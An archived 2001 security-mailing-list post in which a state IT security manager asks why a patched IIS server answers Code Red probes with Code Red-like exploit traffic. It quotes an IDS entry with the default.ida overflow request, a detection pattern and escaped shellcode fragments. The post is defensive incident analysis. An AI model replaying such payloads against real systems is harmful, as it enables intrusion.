Security Incidents mailing list archives

Appeal for Help. NOT Code Red But Is It?

From: "Lindley, Patrick@HHSDC" <PLindley () HHSDC CA GOV>
Date: Mon, 13 Aug 2001 13:41:49 -0700

Anybody know of a similar problem? Is this Code Red or something else? Does
anybody know WHY this would happen?

For the past 13 days we have been experiencing an unusual occurrence.  Every
time a particular patched NT 4.0 server of ours running IIS 4 is probed by a
Code Red infected system, our server immediately responds back to the prober
by attempting to exploit the vulnerability on that system.

Example:  158.42.25.98 sends the "/default.ida?" string followed by the "X"
or "N" string (depending on the Code Red version) and our system immediately
sends back the corresponding hack such as the HTML used in Code Red (Hacked
By Chinese!) or attempts to execute or drop D:EXPLORER.EXE on the attacking
system.

Our IDS logs and HTTP logs confirm these events. Our system in question does
not react as if it is infected with Code Red (i.e. continuously probing
other IP addresses) and as a matter of fact we have confirmed the MS patch
installation, run Trend Micro Systems anti-virus software on it, rebooted
it, and manually scanned for the tell-tale signs of Code Red infection.  It
only sends out this Code Red-like activity when it is probed.

I've included a copy of one entry from our IDS below.  Inbound port was 80
and outbound port was 2913. Context incoming is the data that was sent to us
(for instance from 158.42.25.98) and context outgoing is what our server
sent back.

           Ports: 80 -> 2913
   Context Match: [/]default[.]ida[?][a-zA-Z0-9]+%u
Context Incoming:
://***.***.***.***/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX%u

Context Outgoing:
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\
FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\F
C\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\00\00\00\
00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00^\BF\B9\05\00\00j\07\E8
\10\00\00\00d:

explorer.exe\00\8B\04
$\88\18\FFU\CC\83\F8\FFtM\89\85L\FE\FF\FF\AC\8A\F88>u'j
\E8#\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
\00\00\00\00\00\00\00\00\00\00\00j\01V\FF\B5L\FE\FF\FF\FFU\C8FOu\C5\FF\B5L\F
E\FF\FF\FFU\C4\FE\C3\80\FBd\0F\86L\F9\FF\FF\C3a\C9\C2\04\00\0

===========================
J. Patrick Lindley
Assistant IT Security Manager
Planning & Consulting Division
1651 Alhambra Blvd.
Sacramento, CA 95816
916-739-7976


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Appeal for Help. NOT Code Red But Is It? Lindley, Patrick@HHSDC (Aug 13)
- Re: Appeal for Help. NOT Code Red But Is It? Bryan Andersen (Aug 14)
- <Possible follow-ups>
- Re: Appeal for Help. NOT Code Red But Is It? Ryan Russell (Aug 16)